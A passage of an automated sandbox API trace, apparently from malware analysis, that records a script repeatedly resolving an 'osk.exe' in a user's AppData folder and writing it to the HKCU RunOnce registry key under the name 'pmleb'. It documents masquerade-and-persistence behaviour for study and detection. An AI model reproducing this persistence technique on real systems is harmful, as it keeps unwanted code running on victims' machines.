Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.471] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.471] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.471] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.472] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0080.472] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.472] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7d [0080.472] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.473] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0080.473] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.473] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.473] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.473] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.473] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.473] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.473] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.473] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.474] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.474] RegCloseKey (hKey=0x280) returned 0x0 [0080.474] IUnknown:Release 
(This=0x7a9740) returned 0x1 [0080.474] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.474] SetTimer (hWnd=0x20280, nIDEvent=0x207c, uElapse=0xa, lpTimerFunc=0x0) returned 0x207c [0080.474] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.486] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.486] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.487] KillTimer (hWnd=0x20280, uIDEvent=0x207c) returned 1 [0080.487] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.487] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.487] IUnknown:Release (This=0x787518) returned 0x1 [0080.487] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.487] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.487] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, 
wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.487] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.488] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0080.488] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, 
Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.488] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7e [0080.488] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.489] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0080.489] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f0c0 | out: ppv=0x33f0c0*=0x787518) returned 0x0 [0080.498] ??3@YAXPAX@Z () returned 0x1 [0080.498] IUnknown:Release (This=0x787518) returned 0x1 [0080.498] GetTickCount () returned 0x114a277 [0080.498] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.498] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.498] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.499] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.499] 
ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.499] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.499] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.499] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.499] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.499] RegCloseKey (hKey=0x280) returned 0x0 [0080.500] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.500] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.500] SetTimer (hWnd=0x20280, nIDEvent=0x207d, uElapse=0xa, lpTimerFunc=0x0) returned 0x207d [0080.500] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.501] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.501] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.502] KillTimer (hWnd=0x20280, uIDEvent=0x207d) returned 1 [0080.502] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.502] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.502] IUnknown:Release (This=0x787518) returned 0x1 [0080.502] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.502] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.502] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x11, wReserved2=0x5311, wReserved3=0x74a4, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: 
pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x11, wReserved2=0x5311, wReserved3=0x74a4, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.502] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.502] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.502] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.502] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.503] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.503] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.503] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2 [0080.503] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.503] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3 [0080.503] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.504] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2 [0080.504] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.504] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.504] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.504] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.504] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.504] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.504] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.505] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.505] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
